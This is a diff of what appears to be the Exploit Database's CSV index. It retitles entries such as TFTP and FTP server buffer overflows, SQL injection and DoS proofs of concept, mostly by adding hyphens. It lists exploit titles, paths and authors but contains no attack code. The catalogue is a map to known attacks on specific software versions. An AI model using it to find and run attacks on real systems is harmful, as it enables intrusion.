16347,platforms/windows/remote/16347.rb,"3CTftpSvc TFTP - Long Mode Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16348,platforms/windows/remote/16348.rb,"Quick FTP Pro 2.1 Transfer-Mode Overflow",2010-06-15,metasploit,windows,remote,0
16349,platforms/windows/remote/16349.rb,"TFTPD32 <= 2.21- Long Filename Buffer Overflow",2010-09-20,metasploit,windows,remote,0
16350,platforms/windows/remote/16350.rb,"Allied Telesyn TFTP Server 1.9 - Long Filename Overflow",2011-03-05,metasploit,windows,remote,0
@ -14502,7 +14502,7 @@ id,file,description,date,author,platform,type,port
16732,platforms/windows/remote/16732.rb,"HTTPDX tolog() Function Format String Vulnerability",2010-08-25,metasploit,windows,remote,0
16733,platforms/windows/remote/16733.rb,"FileCopa FTP Server pre 18 Jul Version",2010-04-30,metasploit,windows,remote,21
16734,platforms/windows/remote/16734.rb,"EasyFTP Server <= 1.7.0.11 LIST Command Stack Buffer Overflow",2010-08-03,metasploit,windows,remote,0
16735,platforms/windows/remote/16735.rb,"NetTerm NetFTPD USER Buffer Overflow",2010-10-05,metasploit,windows,remote,0
16735,platforms/windows/remote/16735.rb,"NetTerm NetFTPD - USER Buffer Overflow",2010-10-05,metasploit,windows,remote,0
16736,platforms/windows/remote/16736.rb,"FTPShell 5.1 Stack Buffer Overflow",2010-11-14,metasploit,windows,remote,0
16737,platforms/windows/remote/16737.rb,"EasyFTP Server <= 1.7.0.11 CWD Command Stack Buffer Overflow",2010-04-30,metasploit,windows,remote,0
16738,platforms/windows/remote/16738.rb,"AASync 2.2.1.0 - (Win32) Stack Buffer Overflow (LIST)",2010-11-14,metasploit,windows,remote,0
@ -14800,7 +14800,7 @@ id,file,description,date,author,platform,type,port
17042,platforms/windows/remote/17042.rb,"HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow",2011-03-24,metasploit,windows,remote,80
17043,platforms/windows/remote/17043.rb,"HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow",2011-03-23,metasploit,windows,remote,0
17044,platforms/windows/remote/17044.rb,"HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow",2011-03-23,metasploit,windows,remote,0
17045,platforms/windows/dos/17045.py,"Avaya IP Office Manager 8.1 TFTP DoS",2011-03-24,"Craig Freyman",windows,dos,69
17045,platforms/windows/dos/17045.py,"Avaya IP Office Manager 8.1 TFTP - DoS",2011-03-24,"Craig Freyman",windows,dos,69
17046,platforms/php/webapps/17046.txt,"syndeocms 2.8.02 - Multiple Vulnerabilities",2011-03-24,"High-Tech Bridge SA",php,webapps,0
17047,platforms/windows/remote/17047.rb,"HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow",2011-03-25,metasploit,windows,remote,0
17048,platforms/windows/remote/17048.rb,"VLC AMV Dangling Pointer Vulnerability",2011-03-26,metasploit,windows,remote,0
@ -15229,7 +15229,7 @@ id,file,description,date,author,platform,type,port
17564,platforms/osx/shellcode/17564.asm,"OSX universal ROP shellcode",2011-07-24,pa_kt,osx,shellcode,0
17565,platforms/windows/local/17565.pl,"MPlayer Lite r33064 - m3u Buffer Overflow Exploit (DEP Bypass)",2011-07-24,"C4SS!0 and h1ch4m",windows,local,0
17567,platforms/osx/dos/17567.txt,"Safari SVG DOM processing PoC",2011-07-25,"Nikita Tarakanov",osx,dos,0
17569,platforms/windows/dos/17569.py,"Ciscokits 1.0 TFTP Server File Name DoS",2011-07-25,"Craig Freyman",windows,dos,0
17569,platforms/windows/dos/17569.py,"Ciscokits 1.0 - TFTP Server File Name DoS",2011-07-25,"Craig Freyman",windows,dos,0
17570,platforms/php/webapps/17570.txt,"Musicbox <= 3.7 - Multiple Vulnerabilites",2011-07-25,R@1D3N,php,webapps,0
17571,platforms/php/webapps/17571.txt,"OpenX Ad Server 2.8.7 Cross Site Request Forgery",2011-07-26,"Narendra Shinde",php,webapps,0
17572,platforms/multiple/webapps/17572.txt,"ManageEngine ServiceDesk Plus 8.0.0 Build 8013 Improper User Privileges",2011-07-26,"Narendra Shinde",multiple,webapps,0
@ -15270,8 +15270,8 @@ id,file,description,date,author,platform,type,port
17615,platforms/jsp/webapps/17615.rb,"Sun/Oracle GlassFish Server Authenticated Code Execution",2011-08-05,metasploit,jsp,webapps,0
17616,platforms/php/webapps/17616.txt,"WordPress ProPlayer plugin <= 4.7.7 - SQL Injection Vulnerability",2011-08-05,"Miroslav Stampar",php,webapps,0
17617,platforms/php/webapps/17617.txt,"WordPress Social Slider plugin <= 5.6.5 - SQL Injection Vulnerability",2011-08-05,"Miroslav Stampar",php,webapps,0
17618,platforms/windows/dos/17618.py,"CiscoKits 1.0 TFTP Server DoS (write command)",2011-08-05,"SecPod Research",windows,dos,0
17619,platforms/windows/remote/17619.py,"CiscoKits 1.0 TFTP Server Directory Traversal Vulnerability",2011-08-05,"SecPod Research",windows,remote,0
17618,platforms/windows/dos/17618.py,"CiscoKits 1.0 - TFTP Server DoS (Write command)",2011-08-05,"SecPod Research",windows,dos,0
17619,platforms/windows/remote/17619.py,"CiscoKits 1.0 - TFTP Server Directory Traversal Vulnerability",2011-08-05,"SecPod Research",windows,remote,0
17620,platforms/windows/dos/17620.txt,"threedify designer 5.0.2 - Multiple Vulnerabilities",2011-08-05,"High-Tech Bridge SA",windows,dos,0
17626,platforms/windows/remote/17626.rb,"PXE exploit server",2011-08-05,metasploit,windows,remote,0
17627,platforms/php/webapps/17627.txt,"WordPress UPM Polls plugin <= 1.0.3 - SQL Injection Vulnerability",2011-08-06,"Miroslav Stampar",php,webapps,0
@ -15715,7 +15715,7 @@ id,file,description,date,author,platform,type,port
18134,platforms/windows/remote/18134.rb,"Viscom Software Movie Player Pro SDK ActiveX 6.8",2011-11-20,metasploit,windows,remote,0
18137,platforms/win32/local/18137.rb,"QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS",2011-11-21,hellok,win32,local,0
18138,platforms/windows/remote/18138.txt,"VMware Update Manager Directory Traversal",2011-11-21,"Alexey Sintsov",windows,remote,0
18140,platforms/windows/dos/18140.txt,"win7 keylayout Blue Screen Vulnerability",2011-11-21,instruder,windows,dos,0
18140,platforms/windows/dos/18140.c,"Winows 7 keylayout - Blue Screen Vulnerability",2011-11-21,instruder,windows,dos,0
18142,platforms/windows/local/18142.rb,"Free MP3 CD Ripper 1.1 - (WAV File) Stack Buffer Overflow",2011-11-22,metasploit,windows,local,0
18143,platforms/windows/local/18143.rb,"Microsoft Office Excel Malformed OBJ Record Handling Overflow (MS11-038)",2011-11-22,metasploit,windows,local,0
18145,platforms/linux/remote/18145.py,"Wireshark <= 1.4.4 , DECT Dissector Remote Buffer Overflow",2011-11-22,ipv,linux,remote,0
@ -16192,7 +16192,7 @@ id,file,description,date,author,platform,type,port
18756,platforms/multiple/dos/18756.txt,"OpenSSL ASN1 BIO Memory Corruption Vulnerability",2012-04-19,"Tavis Ormandy",multiple,dos,0
18757,platforms/windows/dos/18757.txt,"VLC 2.0.1 (.mp4) - Crash PoC",2012-04-19,"Senator of Pirates",windows,dos,0
18758,platforms/multiple/dos/18758.txt,"Wireshark 'call_dissector()' NULL Pointer Dereference Denial of Service",2012-04-19,Wireshark,multiple,dos,0
18759,platforms/windows/remote/18759.rb,"TFTP Server for Windows 1.4 ST WRQ Buffer Overflow",2012-04-20,metasploit,windows,remote,0
18759,platforms/windows/remote/18759.rb,"TFTP Server for Windows 1.4 - ST WRQ Buffer Overflow",2012-04-20,metasploit,windows,remote,0
18760,platforms/windows/local/18760.rb,"xRadio 0.95b Buffer Overflow",2012-04-20,metasploit,windows,local,0
18761,platforms/linux/remote/18761.rb,"Adobe Flash Player ActionScript Launch Command Execution Vulnerability",2012-04-20,metasploit,linux,remote,0
18763,platforms/multiple/remote/18763.txt,"Liferay 6.0.x Webdav File Reading Vulnerability",2012-04-22,"Jelmer Kuperus",multiple,remote,0
@ -16272,7 +16272,7 @@ id,file,description,date,author,platform,type,port
18862,platforms/windows/local/18862.php,"Adobe Photoshop CS5.1 U3D.8BI Collada Asset Elements Stack Overflow",2012-05-11,rgod,windows,local,0
18864,platforms/windows/dos/18864.txt,"QNX phrelay/phindows/phditto Multiple Vulnerabilities",2012-05-11,"Luigi Auriemma",windows,dos,0
18865,platforms/php/webapps/18865.rb,"WikkaWiki 1.3.2 Spam Logging PHP Injection",2012-05-12,metasploit,php,webapps,0
18866,platforms/windows/remote/18866.rb,"Distinct TFTP 3.01 Writable Directory Traversal Execution",2012-05-12,metasploit,windows,remote,0
18866,platforms/windows/remote/18866.rb,"Distinct TFTP 3.01 - Writable Directory Traversal Execution",2012-05-12,metasploit,windows,remote,0
18868,platforms/php/webapps/18868.txt,"Sockso <= 1.51 - Persistent XSS",2012-05-12,"Ciaran McNally",php,webapps,0
18869,platforms/windows/local/18869.pl,"AnvSoft Any Video Converter 4.3.6 Unicode Buffer Overflow",2012-05-12,h1ch4m,windows,local,0
18870,platforms/windows/remote/18870.rb,"Firefox 8/9 AttributeChildRemoved() Use-After-Free",2012-05-13,metasploit,windows,remote,0
@ -16334,7 +16334,7 @@ id,file,description,date,author,platform,type,port
18942,platforms/linux/remote/18942.rb,"Symantec Web Gateway 5.0.2.8 Command Execution Vulnerability",2012-05-28,metasploit,linux,remote,0
18944,platforms/php/webapps/18944.txt,"PHP Volunteer Management System 1.0.2 - Multiple SQL Injection Vulnerabilities",2012-05-28,loneferret,php,webapps,0
18945,platforms/windows/dos/18945.txt,"WinRadius Server 2009 Denial of Service",2012-05-29,demonalex,windows,dos,0
18946,platforms/windows/dos/18946.txt,"Tftpd32 DNS Server 4.00 Denial of Service",2012-05-29,demonalex,windows,dos,0
18946,platforms/windows/dos/18946.txt,"Tftpd32 DNS Server 4.00 - Denial of Service",2012-05-29,demonalex,windows,dos,0
18947,platforms/windows/local/18947.rb,"ispVM System XCF File Handling Overflow",2012-05-29,metasploit,windows,local,0
18948,platforms/php/webapps/18948.txt,"PBBoard 2.1.4 - Multiple SQL Injection Vulnerabilities",2012-05-29,loneferret,php,webapps,0
18950,platforms/php/webapps/18950.txt,"NewsAdd <= 1.0 - Multiple SQL Injection Vulnerabilities",2012-05-30,WhiteCollarGroup,php,webapps,0
@ -16781,7 +16781,7 @@ id,file,description,date,author,platform,type,port
19445,platforms/windows/dos/19445,"Microsoft FrontPage Personal WebServer 1.0 PWS DoS Vulnerability",1999-08-08,Narr0w,windows,dos,0
19446,platforms/multiple/dos/19446.pl,"WebTrends Enterprise Reporting Server 1.5 Negative Content Length DoS Vulnerability",1999-08-08,rpc,multiple,dos,0
19447,platforms/multiple/local/19447.c,"NetBSD <= 1.4,OpenBSD <= 2.5,Solaris <= 7.0 profil(2) Vulnerability",1999-08-09,"Ross Harvey",multiple,local,0
19448,platforms/windows/remote/19448.c,"ToxSoft NextFTP 1.82 Buffer Overflow Vulnerability",1999-08-03,UNYUN,windows,remote,0
19448,platforms/windows/remote/19448.c,"ToxSoft NextFTP 1.82 - Buffer Overflow Vulnerability",1999-08-03,UNYUN,windows,remote,0
19449,platforms/windows/remote/19449.c,"Fujitsu Chocoa 1.0 beta7R ""Topic"" Buffer Overflow Vulnerability",1999-08-03,UNYUN,windows,remote,0
19450,platforms/windows/remote/19450.c,"CREAR ALMail32 1.10 Buffer Overflow Vulnerability",1999-08-08,UNYUN,windows,remote,0
19451,platforms/multiple/remote/19451,"Microsoft Windows 98 a/98 b/98SE,Solaris 2.6 IRDP Vulnerability",1999-08-11,L0pth,multiple,remote,0
@ -17686,7 +17686,7 @@ id,file,description,date,author,platform,type,port
20388,platforms/linux/dos/20388.txt,"BIND 8.2.2-P5 Denial of Service Vulnerability",2000-11-01,"Fabio Pietrosanti",linux,dos,0
20390,platforms/php/webapps/20390.txt,"Joomla FireBoard Component (com_fireboard) SQL Injection Vulnerability",2012-08-09,Vulnerability-Lab,php,webapps,0
20391,platforms/php/webapps/20391.php,"Kamads Classifieds 2.0 - Admin Hash Disclosure",2012-08-09,Mr.tro0oqy,php,webapps,0
20392,platforms/windows/remote/20392.rb,"NetDecision 4.2 TFTP Writable Directory Traversal Execution",2012-08-10,metasploit,windows,remote,0
20392,platforms/windows/remote/20392.rb,"NetDecision 4.2 - TFTP Writable Directory Traversal Execution",2012-08-10,metasploit,windows,remote,0
20393,platforms/windows/webapps/20393.py,"Cyclope Employee Surveillance Solution 6.0/6.1.0/6.2.0/6.2.1/6.3.0 - SQL Injection",2012-08-09,loneferret,windows,webapps,0
20394,platforms/unix/remote/20394.c,"BNC 2.2.4/2.4.6/2.4.8 IRC Proxy Buffer Overflow Vulnerability (1)",1998-12-26,duke,unix,remote,0
20395,platforms/unix/remote/20395.c,"BNC 2.2.4/2.4.6/2.4.8 IRC Proxy Buffer Overflow Vulnerability (2)",1998-12-26,"jamez and dumped",unix,remote,0
@ -18896,7 +18896,7 @@ id,file,description,date,author,platform,type,port
21652,platforms/windows/remote/21652.cpp,"Microsoft SQL Server 2000 Resolution Service Heap Overflow Vulnerability",2002-07-25,"David Litchfield",windows,remote,0
21653,platforms/windows/remote/21653.c,"KaZaA Media Desktop 1.7.1 Large Message Denial of Service Vulnerability",2002-07-25,"Josh and omega",windows,remote,0
21654,platforms/windows/remote/21654.c,"IPSwitch IMail 6.x/7.0/7.1 Web Messaging HTTP Get Buffer Overflow Vulnerability",2002-07-25,anonymous,windows,remote,0
21655,platforms/hardware/dos/21655.c,"Cisco IOS 11.x TFTP Server Long File Name Buffer Overflow Vulnerability",2002-07-26,FX,hardware,dos,0
21655,platforms/hardware/dos/21655.c,"Cisco IOS 11.x - TFTP Server Long File Name Buffer Overflow Vulnerability",2002-07-26,FX,hardware,dos,0
21656,platforms/hardware/dos/21656.txt,"Lucent Access Point 300/600/1500 IP Services Router Long HTTP Request DoS",2002-07-27,FX,hardware,dos,0
21657,platforms/hardware/dos/21657.txt,"HP ProCurve Switch 4000M SNMP Write Denial of Service Vulnerability",2002-07-27,FX,hardware,dos,0
21658,platforms/cgi/webapps/21658.html,"Ben Chivers Easy Homepage Creator 1.0 File Modification Vulnerability",2002-07-29,"Arek Suroboyo",cgi,webapps,0
@ -19195,8 +19195,8 @@ id,file,description,date,author,platform,type,port
21960,platforms/php/webapps/21960.txt,"gBook 1.4 Administrative Access Vulnerability",2002-10-22,frog,php,webapps,0
21961,platforms/php/webapps/21961.txt,"MyMarket 1.71 Form_Header.PHP Cross-Site Scripting Vulnerability",2002-10-23,qber66,php,webapps,0
21962,platforms/cgi/webapps/21962.txt,"Mojo Mail 2.7 Email Form Cross Site Scripting Vulnerability",2002-10-24,"Daniel Boland",cgi,webapps,0
21963,platforms/windows/dos/21963.pl,"SolarWinds TFTP Server Standard Edition 5.0.55 Large UDP Packet Vulnerability",2002-10-24,D4rkGr3y,windows,dos,0
21964,platforms/windows/remote/21964.txt,"solarwinds tftp server standard edition 5.0.55 - Directory Traversal vulnerability",2002-10-25,"Matthew Murphy",windows,remote,0
21963,platforms/windows/dos/21963.pl,"SolarWinds TFTP Server Standard Edition 5.0.55 - Large UDP Packet Vulnerability",2002-10-24,D4rkGr3y,windows,dos,0
21964,platforms/windows/remote/21964.txt,"Solarwinds TFTP Server Standard Edition 5.0.55 - Directory Traversal vulnerability",2002-10-25,"Matthew Murphy",windows,remote,0
21965,platforms/windows/dos/21965.txt,"Alt-N MDaemon 6.0.x POP Server Buffer Overflow Vulnerability",2002-10-28,D4rkGr3y,windows,dos,0
21966,platforms/cgi/webapps/21966.txt,"MailReader.com 2.3.x NPH-MR.CGI File Disclosure Vulnerability",2002-10-28,pokleyzz,cgi,webapps,0
21967,platforms/php/webapps/21967.txt,"Benjamin Lefevre Dobermann Forum 0.x entete.php subpath Parameter Remote File Inclusion",2002-10-28,frog,php,webapps,0
@ -19254,8 +19254,8 @@ id,file,description,date,author,platform,type,port
22021,platforms/linux/remote/22021.sh,"Lonerunner Zeroo HTTP Server 1.5 - Remote Buffer Overflow Vulnerability",2002-11-16,"dong-h0un U",linux,remote,0
22022,platforms/windows/remote/22022.txt,"Macromedia Flash 6.0.47 .0 SWRemote Heap Corruption Vulnerability",2002-11-18,LOM,windows,remote,0
22023,platforms/windows/remote/22023.c,"MailEnable 1.501x Email Server Buffer Overflow Vulnerability",2002-11-18,redsand,windows,remote,0
22024,platforms/windows/remote/22024.txt,"TFTPD32 2.50 Arbitrary File Download/Upload Vulnerability",2002-11-18,"Aviram Jenik",windows,remote,0
22025,platforms/windows/remote/22025.pl,"TFTPD32 2.50 Long Filename Buffer Overflow Vulnerability",2002-11-19,"Aviram Jenik",windows,remote,0
22024,platforms/windows/remote/22024.txt,"TFTPD32 2.50 - Arbitrary File Download/Upload Vulnerability",2002-11-18,"Aviram Jenik",windows,remote,0
22025,platforms/windows/remote/22025.pl,"TFTPD32 2.50 - Long Filename Buffer Overflow Vulnerability",2002-11-19,"Aviram Jenik",windows,remote,0
22026,platforms/linux/remote/22026.txt,"Mhonarc 2.5.x Mail Header HTML Injection Vulnerability",2002-11-19,"Steven Christey",linux,remote,0
22027,platforms/windows/remote/22027.txt,"Microsoft Java Virtual Machine 3802 Series Bytecode Verifier Vulnerability",2002-11-21,"Last Stage of Delirium",windows,remote,0
22028,platforms/windows/remote/22028.txt,"Symantec Java! JustInTime Compiler 210.65 Command Execution Vulnerability",2002-11-21,"Last Stage of Delirium",windows,remote,0
@ -19812,7 +19812,7 @@ id,file,description,date,author,platform,type,port
22593,platforms/windows/remote/22593.html,"Yahoo! Voice Chat ActiveX Control 1.0 .0.43 Buffer Overflow Vulnerability",2003-05-12,cesaro,windows,remote,0
22594,platforms/linux/local/22594.c,"CDRTools CDRecord 1.11/2.0 Devname Format String Vulnerability",2003-05-13,CMN,linux,local,0
22595,platforms/php/webapps/22595.txt,"PHP-Nuke 6.5 Modules.PHP Username URI Parameter Cross Site Scripting Vulnerability",2003-05-13,"Ferruh Mavituna",php,webapps,0
22596,platforms/hardware/dos/22596.txt,"Verilink NetEngine 6100-4 Broadband Router TFTP Packet Remote Denial of Service Vulnerability",2003-05-08,"Lorenzo Cerulli and Fabio Annunziato",hardware,dos,0
22596,platforms/hardware/dos/22596.txt,"Verilink NetEngine 6100-4 Broadband Router - TFTP Packet Remote Denial of Service Vulnerability",2003-05-08,"Lorenzo Cerulli and Fabio Annunziato",hardware,dos,0
22597,platforms/php/webapps/22597.txt,"PHP-Nuke 6.5 - Multiple Downloads Module SQL Injection Vulnerabilities",2003-05-13,"Albert Puigsech Galicia",php,webapps,0
22598,platforms/php/webapps/22598.txt,"PHP-Nuke 6.0/6.5 Web_Links Module Path Disclosure Vulnerability",2003-05-13,"Rynho Zeros Web",php,webapps,0
22599,platforms/php/webapps/22599.html,"vBulletin 3.0 Private Message HTML Injection Vulnerability",2003-05-14,"Ferruh Mavituna",php,webapps,0
@ -19979,7 +19979,7 @@ id,file,description,date,author,platform,type,port
22762,platforms/php/webapps/22762.txt,"Sphera HostingDirector 1.0/2.0/3.0 VDS Control Panel Multiple Cross-Site Scripting Vulnerabilities",2003-06-13,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0
22766,platforms/php/webapps/22766.txt,"friendsinwar FAQ Manager (view_faq.php, question param) SQL Injection Vulnerability",2012-11-16,unsuprise,php,webapps,0
22767,platforms/php/webapps/22767.txt,"PostNuke 0.723 User.PHP UNAME Cross-Site Scripting Vulnerability",2003-06-13,"David F. Madrid",php,webapps,0
22768,platforms/linux/local/22768.pl,"ATFTP 0.7 Timeout Command Line Argument Local Buffer Overflow Vulnerability",2003-06-06,"Julien LANTHEA",linux,local,0
22768,platforms/linux/local/22768.pl,"ATFTP 0.7 - Timeout Command Line Argument Local Buffer Overflow Vulnerability",2003-06-06,"Julien LANTHEA",linux,local,0
22769,platforms/windows/remote/22769.txt,"Methodus 3 Web Server File Disclosure Vulnerability",2003-06-13,"Peter Winter-Smith",windows,remote,0
22770,platforms/cgi/webapps/22770.txt,"Infinity CGI Exploit Scanner 3.11 Cross-Site Scripting Vulnerability",2003-06-12,badpack3t,cgi,webapps,0
22771,platforms/linux/remote/22771.txt,"Adobe Acrobat Reader (UNIX) 5.0 6,Xpdf 0.9x Hyperlinks Arbitrary Command Execution",2003-06-13,"Martyn Gilmore",linux,remote,0
@ -20267,7 +20267,7 @@ id,file,description,date,author,platform,type,port
23063,platforms/bsd/local/23063.c,"BSD-Games 2.x Monop Player Name Local Buffer Overrun Vulnerability (2)",2003-08-25,N4rK07IX,bsd,local,0
23064,platforms/php/webapps/23064.txt,"Attila PHP 3.0 - SQL Injection Unauthorized Privileged Access Vulnerability",2003-08-26,frog,php,webapps,0
23065,platforms/php/webapps/23065.txt,"AldWeb MiniPortail 1.9/2.x LNG Parameter Cross-Site Scripting Vulnerability",2003-08-27,"Bahaa Naamneh",php,webapps,0
23066,platforms/windows/remote/23066.pl,"Tellurian TftpdNT 1.8/2.0 Long Filename Buffer Overrun Vulnerability",2003-08-27,storm,windows,remote,0
23066,platforms/windows/remote/23066.pl,"Tellurian TftpdNT 1.8/2.0 - Long Filename Buffer Overrun Vulnerability",2003-08-27,storm,windows,remote,0
23067,platforms/php/webapps/23067.txt,"eNdonesia 8.2/8.3 Mod Parameter Cross-Site Scripting Vulnerability",2003-08-27,"Bahaa Naamneh",php,webapps,0
23068,platforms/windows/remote/23068.txt,"file sharing for net 1.5 - Directory Traversal file disclosure vulnerability",2003-08-30,sickle,windows,remote,0
23069,platforms/multiple/remote/23069.txt,"SAP Internet Transaction Server 4620.2.0.323011 Build 46B.323011 Information Disclosure Vulnerability",2003-08-30,"Martin Eiszner",multiple,remote,0
@ -20884,8 +20884,8 @@ id,file,description,date,author,platform,type,port
23705,platforms/cgi/webapps/23705.txt,"ShopCartCGI 2.3 gotopage.cgi Traversal Arbitrary File Access",2004-02-16,G00db0y,cgi,webapps,0
23706,platforms/cgi/webapps/23706.txt,"ShopCartCGI 2.3 genindexpage.cgi Traversal Arbitrary File Access",2004-02-16,G00db0y,cgi,webapps,0
23707,platforms/multiple/remote/23707.txt,"Freeform Interactive Purge 1.4.7/Purge Jihad 2.0.1 Game Client Remote Buffer Overflow Vulnerability",2004-02-16,"Luigi Auriemma",multiple,remote,0
23708,platforms/windows/dos/23708.c,"RobotFTP Server 1.0/2.0 Username Buffer Overflow Vulnerability (1)",2004-02-16,gsicht,windows,dos,0
23709,platforms/windows/dos/23709.c,"RobotFTP Server 1.0/2.0 Username Buffer Overflow Vulnerability (2)",2004-02-16,NoRpiuS,windows,dos,0
23708,platforms/windows/dos/23708.c,"RobotFTP Server 1.0/2.0 - Username Buffer Overflow Vulnerability (1)",2004-02-16,gsicht,windows,dos,0
23709,platforms/windows/dos/23709.c,"RobotFTP Server 1.0/2.0 - Username Buffer Overflow Vulnerability (2)",2004-02-16,NoRpiuS,windows,dos,0
23710,platforms/php/webapps/23710.txt,"YABB SE 1.5 Quote Parameter SQL Injection Vulnerability",2004-02-16,BaCkSpAcE,php,webapps,0
23711,platforms/php/webapps/23711.txt,"Ecommerce Corporation Online Store Kit 3.0 More.PHP id Parameter SQL Injection",2003-02-17,"David Sopas Ferreira",php,webapps,0
23712,platforms/php/webapps/23712.txt,"Ecommerce Corporation Online Store Kit 3.0 More.PHP XSS",2003-02-17,"David Sopas Ferreira",php,webapps,0
@ -21981,7 +21981,7 @@ id,file,description,date,author,platform,type,port
24860,platforms/hardware/webapps/24860.txt,"Verizon Fios Router MI424WR-GEN3I - CSRF Vulnerability",2013-03-19,"Jacob Holcomb",hardware,webapps,0
24861,platforms/php/webapps/24861.txt,"Rebus:list (list.php, list_id param) - SQL Injection Vulnerability",2013-03-19,"Robert Cooper",php,webapps,0
24862,platforms/php/webapps/24862.txt,"ViewGit 0.0.6 - Multiple XSS Vulnerabilities",2013-03-19,"Matthew R. Bucci",php,webapps,0
24863,platforms/windows/local/24863.html,"EastFTP ActiveX Control 0Day",2013-03-20,Dr_IDE,windows,local,0
24863,platforms/windows/local/24863.html,"EastFTP 4.6.02 - ActiveX Control 0Day",2013-03-20,Dr_IDE,windows,local,0
24864,platforms/hardware/webapps/24864.pl,"StarVedia IPCamera IC502w IC502w+ v020313 - Username/Password Disclosure",2013-03-22,"Todor Donev",hardware,webapps,0
24865,platforms/linux/dos/24865.txt,"GnuTLS libgnutls Double-free Certificate List Parsing Remote DoS",2013-03-22,"Shawn the R0ck",linux,dos,0
24866,platforms/hardware/dos/24866.txt,"TP-Link TL-WR740N Wireless Router - Denial of Service Exploit",2013-03-22,LiquidWorm,hardware,dos,0
@ -22239,7 +22239,7 @@ id,file,description,date,author,platform,type,port
25135,platforms/windows/dos/25135.txt,"Syslog Watcher Pro 2.8.0.812 - (Date Parameter) - Cross Site Scripting Vulnerability",2013-05-01,demonalex,windows,dos,0
25136,platforms/php/remote/25136.rb,"phpMyAdmin Authenticated Remote Code Execution via preg_replace()",2013-05-01,metasploit,php,remote,0
25137,platforms/php/remote/25137.rb,"Wordpress W3 Total Cache PHP Code Execution",2013-05-01,metasploit,php,remote,0
25138,platforms/hardware/webapps/25138.txt,"D-Link IP Cameras Multiple Vulnerabilities",2013-05-01,"Core Security",hardware,webapps,0
25138,platforms/hardware/webapps/25138.txt,"D-Link IP Cameras - Multiple Vulnerabilities",2013-05-01,"Core Security",hardware,webapps,0
25139,platforms/hardware/webapps/25139.txt,"Vivotek IP Cameras Multiple Vulnerabilities",2013-05-01,"Core Security",hardware,webapps,0
25140,platforms/windows/dos/25140.txt,"WPS Office Wpsio.dll - Stack Buffer Overflow Vulnerability",2013-05-01,Zhangjiantao,windows,dos,0
25141,platforms/windows/local/25141.rb,"AudioCoder 0.8.18 - Buffer Overflow Exploit (SEH)",2013-05-02,metacom,windows,local,0
@ -23072,7 +23072,7 @@ id,file,description,date,author,platform,type,port
25984,platforms/cfm/webapps/25984.txt,"Simple Message Board 2.0 beta1 Thread.CFM Cross-Site Scripting Vulnerability",2005-07-14,rUnViRuS,cfm,webapps,0
25985,platforms/cfm/webapps/25985.txt,"Simple Message Board 2.0 beta1 Search.CFM Cross-Site Scripting Vulnerability",2005-07-14,rUnViRuS,cfm,webapps,0
25986,platforms/php/remote/25986.txt,"Plesk < 9.5.4 - Remote Exploit (0day)",2013-06-05,kingcope,php,remote,0
25987,platforms/hardware/remote/25987.txt,"Xpient Cash Drawer Operation Vulnerability",2013-06-05,"Core Security",hardware,remote,0
25987,platforms/hardware/remote/25987.txt,"Xpient - Cash Drawer Operation Vulnerability",2013-06-05,"Core Security",hardware,remote,0
25988,platforms/multiple/remote/25988.txt,"Oracle9i Application Server 9.0.2 MOD_ORADAV Access Control Vulnerability",2003-02-13,"David Litchfield",multiple,remote,0
25989,platforms/windows/remote/25989.txt,"Nullsoft Winamp 5.0 - Malformed ID3v2 Tag Buffer Overflow Vulnerability",2005-07-15,"Leon Juranic",windows,remote,0
25990,platforms/php/webapps/25990.txt,"Clever Copy 2.0 Calendar.PHP Cross-Site Scripting Vulnerability",2005-07-15,Lostmon,php,webapps,0
@ -23093,7 +23093,7 @@ id,file,description,date,author,platform,type,port
26006,platforms/multiple/remote/26006.txt,"Oracle Reports Server 6.0.8/9.0.x Unauthorized Report Execution Vulnerability",2005-07-19,"Alexander Kornbrust",multiple,remote,0
26007,platforms/php/webapps/26007.txt,"PHP Ticket System Beta 1 - CSRF Vulnerability",2013-06-07,"Pablo Ribeiro",php,webapps,0
26009,platforms/php/webapps/26009.txt,"AfterLogic WebMail Lite PHP 7.0.1 - CSRF Vulnerability",2013-06-07,"Pablo Ribeiro",php,webapps,0
26010,platforms/windows/dos/26010.txt,"Quick TFTP Server 2.2 - Denial of Service",2013-06-07,npn,windows,dos,0
26010,platforms/windows/dos/26010.py,"Quick TFTP Server 2.2 - Denial of Service",2013-06-07,npn,windows,dos,0
26012,platforms/windows/remote/26012.rb,"Novell Zenworks Mobile Device Managment Local File Inclusion Vulnerability",2013-06-07,metasploit,windows,remote,80
26013,platforms/multiple/remote/26013.txt,"Oracle Forms 10g/ 6i/9i/4.5.10/5.0/6.0.8 Services Unauthorized Form Execution Vulnerability",2005-07-19,"Alexander Kornbrust",multiple,remote,0
26014,platforms/php/webapps/26014.txt,"FForm Sender 1.0 Processform.PHP3 Name Cross Site Scripting Vulnerability",2005-07-19,rgod,php,webapps,0
@ -26668,7 +26668,7 @@ id,file,description,date,author,platform,type,port
29732,platforms/php/remote/29732.php,"PHP 5.2 EXT/Filter Function Remote Buffer Overflow Vulnerability",2007-03-12,"Stefan Esser",php,remote,0
29733,platforms/php/webapps/29733.txt,"PHP-Nuke 8.2.4 - Multiple Vulnerabilities",2013-11-20,"Sojobo dev team",php,webapps,80
29734,platforms/linux/remote/29734.txt,"PineApp MailSecure - Remote Command Execution",2013-11-20,"Ruben Garrote García",linux,remote,7443
29735,platforms/hardware/remote/29735.rb,"D-Link TFTP 1.0 Transporting Mode Remote Buffer Overflow Vulnerability",2007-03-12,LSO,hardware,remote,0
29735,platforms/hardware/remote/29735.rb,"D-Link TFTP 1.0 - Transporting Mode Remote Buffer Overflow Vulnerability",2007-03-12,LSO,hardware,remote,0
29736,platforms/php/webapps/29736.txt,"ClipShare 1.5.3 ADODB-Connection.Inc.PHP Remote File Include Vulnerability",2007-03-12,"RaeD Hasadya",php,webapps,0
29737,platforms/php/webapps/29737.txt,"Weekly Drawing Contest 0.0.1 Check_Vote.PHP Local File Include Vulnerability",2007-03-13,"BorN To K!LL",php,webapps,0
29738,platforms/windows/dos/29738.txt,"Microsoft Windows XP/2000 WinMM.DLL - WAV Files Remote Denial of Service (DoS) Vulnerability",2007-03-13,"Michal Majchrowicz",windows,dos,0
@ -26944,7 +26944,7 @@ id,file,description,date,author,platform,type,port
